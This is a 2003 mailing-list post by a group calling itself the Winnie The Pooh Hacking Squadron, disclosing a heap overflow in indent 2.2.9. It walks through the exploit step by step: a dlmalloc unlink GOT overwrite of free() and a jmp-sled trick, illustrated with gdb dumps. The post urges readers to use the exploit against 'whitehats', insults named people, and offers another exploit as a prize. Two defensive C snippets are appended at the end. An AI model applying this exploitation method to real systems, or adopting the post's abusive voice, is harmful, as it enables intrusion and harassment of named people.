Message-ID: <200312261310.hBQDAWMJ081601@mailserver2.hushmail.com>
From: wtphs at hush.com (Winnie The Pooh Hacking Squadron)
Subject: Winnie The Pooh Hacking Squadron Presents: 0day 31337 vulnerability in indent 2.2.9
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Software: indent
Version: 2.2.9
Vulnerability: buffer overflow while parsing .c file
Found date: Aug 2002
Release date: today you stupid whitehat boy
Researchers: Winnie The Pooh Hacking Squadron
Favourite food: whitehat soup
[0] LICENSE
1) No whitehat whore can use this in his pseudo-security work
2) divineint can't trade exploit attached to this advisory on
#darknet@...et nor other lame channel (for people who don't
know it yet - his new nick is illumanti(z), is he hiding ?!)
3) Every hacker can implement exploit for this vuln in his
codes to protect them from script kiddies and whitehats.
4) WtPHS strongly encourage hackers to use this against
whitehats.
5) WtPHS don't give a shit if you hurt yourself
[1] INTRO
indent is really fucking leet tool that improves appearance
of C source code. It was designed to help people reading
sources written by damn stupid and unskilled programmers like
You Dong-Hun or Theo the Radt. It is really helpful nowadays
because of those whores who think they are coders. Unfortunately
authors of indent also made their software vulnerable to buffer
overflow.
[2] DETAILS
handle_token_colon(...) is vulnerable function. Buffer overflow
occurs while parsing text (from .c file of korz), which indent
treats like label. It copies whole 'label' to a 1000 bytes long
buffer on heap, without bounds checking. (Note for divineint-alike
people: such overflow can lead to overwrite of heap structures and
as result of this - arbitrary code execution).
This is vulnerable part of handle_token_colon(...) function:
    for (t_ptr = s_code; *t_ptr; ++t_ptr)
      {
        *e_lab++ = *t_ptr;  /* turn everything so far into a label */
      }
(Note for gorion(*)-alike people: this loop will keep copying until a NUL
byte is found in source string)
[3] EXPLOITATION
This section is needed for stupid people like divineint or Lorenzo
Hernandez Garcia-Hierro (Good Lord! I feel like in south-american
telenovela saying his name).
Smart people choose clear_buf_break_list() function to cause code
execution. This function is executed just after our vulnerable loop,
so we don't risk application crash. indent breaks source code and
makes double-linked list (buf_break_list) of code parts. Mentioned
function free()'s all buf_break_list entries.
This double-linked list entries are allocated after 'labbuf' (e_lab
points to labbuf) so we are able to overwrite it.
Now exploitation is very easy. Overwrite free() GOT entry with and
make clear_buf_break_list() loop run once again by setting 'prev'
field of buf_break_st_ty struct to some readable value.
Exploit for this vulnerability for indent 2.2.9 from slackware 9.0
is attached to this advisory.
NOTICE!!!! QUIZ FOR KIDDIES:
---------------------------------------------------------------------
This exploit have simple execve(shell) shellcode. What do you have
to change to make this exploit useful ?
---------------------------------------------------------------------
FIRST PERSON WHO SENDS US GOOD ANSWER WINS OpenSSH Buffer Management
Vulnerability REMOTE EXPLOIT ... DON'T WAIT !! DO IT NOW!
[4] EDUCATIONAL VALUE
What's educational here? One technique used in this exploit. Let's call
FD = WHAT and BK = WHERE-8. People with IQ > 75 know that unlink()
will do *(WHAT+0xc)=(WHERE-8) except *((WHERE-8)+8) = WHAT.
If we point WHAT to NOPs before our shellcode, unlink() will change
few of our NOPs to something else. Executing this 'somethingelse'
will probably crash our application. It looks like this:
Before unlink():
(gdb) x/20i 0x805b440
0x805b440: nop
0x805b441: nop
0x805b442: nop
0x805b443: nop
0x805b444: nop
0x805b445: nop
0x805b446: nop
0x805b447: nop
0x805b448: nop
0x805b449: nop
0x805b44a: nop
0x805b44b: nop
0x805b44c: nop
0x805b44d: nop
0x805b44e: nop
0x805b44f: nop
0x805b450: nop
0x805b451: nop
0x805b452: nop
0x805b453: nop
(gdb) x/x 0x8058dc8
0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x40019f52
After unlink():
(gdb) x/x 0x8058dc8
0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x0805b440
(gdb) x/20i 0x805b440
0x805b440: nop
0x805b441: nop
0x805b442: nop
0x805b443: nop
0x805b444: nop
0x805b445: nop
0x805b446: nop
0x805b447: nop
0x805b448: nop
0x805b449: nop
0x805b44a: nop
0x805b44b: nop
0x805b44c: rorb $0x90,0x90900805(%ebp)
0x805b453: nop
0x805b454: nop
0x805b455: nop
0x805b456: nop
0x805b457: nop
0x805b458: nop
0x805b459: nop
Next call to free() will jump to 0x805b440. If execution flow will
reach 0x805b44c, program will crash at this instruction.
Solution is simple, however WtPHS don't remember anybody describing
it before, so ... here it is: Instead of NOPs you can use relative
jmp's like this:
Before unlink():
(gdb) x/20i 0x805b440
0x805b440: jmp 0x805b44a
0x805b442: jmp 0x805b44c
0x805b444: jmp 0x805b44e
0x805b446: jmp 0x805b450
0x805b448: jmp 0x805b452
0x805b44a: jmp 0x805b454
0x805b44c: jmp 0x805b456
0x805b44e: jmp 0x805b458
0x805b450: jmp 0x805b45a
0x805b452: jmp 0x805b45c
0x805b454: jmp 0x805b45e
0x805b456: jmp 0x805b460
0x805b458: jmp 0x805b462
0x805b45a: jmp 0x805b464
0x805b45c: jmp 0x805b466
0x805b45e: jmp 0x805b468
0x805b460: jmp 0x805b46a
0x805b462: jmp 0x805b46c
0x805b464: jmp 0x805b46e
0x805b466: jmp 0x805b470
After unlink():
(gdb) x/10i 0x805b440
0x805b440: jmp 0x805b44a
0x805b442: jmp 0x805b44c
0x805b444: jmp 0x805b44e
0x805b446: jmp 0x805b450
0x805b448: jmp 0x805b452
0x805b44a: jmp 0x805b454
0x805b44c: rorb $0xeb,0x8eb0805(%ebp)
0x805b453: or %ch,%bl
0x805b455: or %ch,%bl
0x805b457: or %ch,%bl
(gdb) x/10i 0x805b454
0x805b454: jmp 0x805b45e
0x805b456: jmp 0x805b460
0x805b458: jmp 0x805b462
0x805b45a: jmp 0x805b464
0x805b45c: jmp 0x805b466
0x805b45e: jmp 0x805b468
0x805b460: jmp 0x805b46a
0x805b462: jmp 0x805b46c
0x805b464: jmp 0x805b46e
0x805b466: jmp 0x805b470
This way we jumped over shitty instruction. These jmps
will lead execution flow to our shellcode, but to be sure
that no jmp will jump into middle of shellcode you have
to put few (at least 8) NOPs before shellcode. Then last
jmp will jump to NOPs and then shellcode will be executed
properly.
[5] IMPACT
Possible impact is quite big. For example companies and software
developers that are terrified because of their software is damn
shitty (Cisco, Apache, OpenBSD, Linux Kernel first come to our
mind) could implement exploit for this vuln into their source
codes to make hackers life difficult.
[6] FLAMES, SHOUTOUTS and FINAL NOTES
*) no, divineint, you can't get our juarez - stop begging for it
biatch
*) no, Stefan Esser, you can't steal our juarez and publish it
as your own, because you are too stupid to own us.
*) shoutouts to our brotherly squad - Mickey Mouse Hacking Squadron
*) shoutouts to PHC for terrorizing whitehats and full-disclosure
*) recent OpenSSH vulnerability is exploitable
*) greetings to Lorenzo Hernandez Garcia-Hierro for making us
laugh on the floor while reading his posts.
*) kudos to Alan Alexander Milne (R.I.P - 1956)
[7] OUTRO
the end...
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.3
wkYEARECAAYFAj/sM6EACgkQYE4zNxPdkhNhpACfc5C40UAJ7K8ybtvg6o6uXUzhoR0A
oI+4wR01MMKbGwVqDdpjIxXRrzX7
=eC7E
-----END PGP SIGNATURE-----
-------------- next part --------------
A non-text attachment was scrubbed...
Name: WinnieThePooh-indent-2.2.9-0day.tar.bz2
Type: application/x-bzip2
Size: 1511 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031226/f31ac576/WinnieThePooh-indent-2.2.9-0day.tar.bin
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: WinnieThePooh-indent-2.2.9-0day.tar.bz2.sig
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031226/f31ac576/WinnieThePooh-indent-2.2.9-0day.tar.bz2.ksh
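The loop quoted in section [2] writes through e_lab with no regard for the size of the label buffer. As an added example (not part of the original post and not indent's own fix), a bounds-aware append that grows the buffer before copying; the struct and function names are hypothetical stand-ins for labbuf and e_lab.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for indent's label buffer (labbuf / e_lab). */
struct label_buf {
    char  *base;  /* start of the heap allocation */
    char  *end;   /* next write position, like e_lab */
    size_t cap;   /* bytes allocated at base */
};

int label_buf_init(struct label_buf *lb, size_t cap)
{
    if (cap == 0 || (lb->base = malloc(cap)) == NULL)
        return -1;
    lb->end = lb->base;
    lb->cap = cap;
    lb->base[0] = '\0';
    return 0;
}

/* Append src, growing the buffer rather than writing past its end.
 * Returns 0 on success, -1 on size overflow or allocation failure. */
int label_buf_append(struct label_buf *lb, const char *src)
{
    size_t used = (size_t)(lb->end - lb->base);
    size_t n = strlen(src);
    size_t ncap = lb->cap;

    if (n >= SIZE_MAX - used)
        return -1;                 /* used + n + 1 would wrap */
    while (ncap < used + n + 1) {
        if (ncap > SIZE_MAX / 2)
            return -1;
        ncap *= 2;
    }
    if (ncap != lb->cap) {
        char *p = realloc(lb->base, ncap);
        if (p == NULL)
            return -1;             /* old buffer is still valid */
        lb->base = p;
        lb->end = p + used;
        lb->cap = ncap;
    }
    memcpy(lb->end, src, n);
    lb->end += n;
    *lb->end = '\0';
    return 0;
}
```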
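Section [4] depends on unlink() writing through FD and BK without validating them. As an added example (not part of the original post, and not any allocator's actual source), the link-integrity check that later glibc releases apply before unlinking, shown on a simplified chunk struct; the struct layout and function names are assumptions.

```c
#include <stddef.h>

/* Simplified chunk header (assumption: modelled on a dlmalloc-style
 * free chunk; fd/bk sit at offsets 8 and 0xc only on 32-bit builds). */
struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;   /* the advisory's FD */
    struct chunk *bk;   /* the advisory's BK */
};

/* Unlink p only if both neighbours still point back at p.
 * Returns 0 on success, -1 if the links fail the integrity check. */
int safe_unlink(struct chunk *p)
{
    struct chunk *fd = p->fd, *bk = p->bk;

    if (fd == NULL || bk == NULL || fd->bk != p || bk->fd != p)
        return -1;      /* corrupted list: perform no writes */
    fd->bk = bk;
    bk->fd = fd;
    return 0;
}

/* Constructed case: x's links were overwritten to point at two
 * unrelated records. Returns 1 if the unlink was refused and neither
 * record was modified. */
int corrupted_links_rejected(void)
{
    struct chunk t1 = {0}, t2 = {0}, x = {0};
    x.fd = &t1;
    x.bk = &t2;
    return safe_unlink(&x) == -1 && t1.bk == NULL && t2.fd == NULL;
}

/* Intact circular list a <-> b <-> c: unlinking b must succeed. */
int intact_list_unlinks(void)
{
    struct chunk a = {0}, b = {0}, c = {0};
    a.fd = &b; b.fd = &c; c.fd = &a;
    a.bk = &c; b.bk = &a; c.bk = &b;
    return safe_unlink(&b) == 0 && a.fd == &c && c.bk == &a;
}

int main(void)
{
    return (corrupted_links_rejected() && intact_list_unlinks()) ? 0 : 1;
}
```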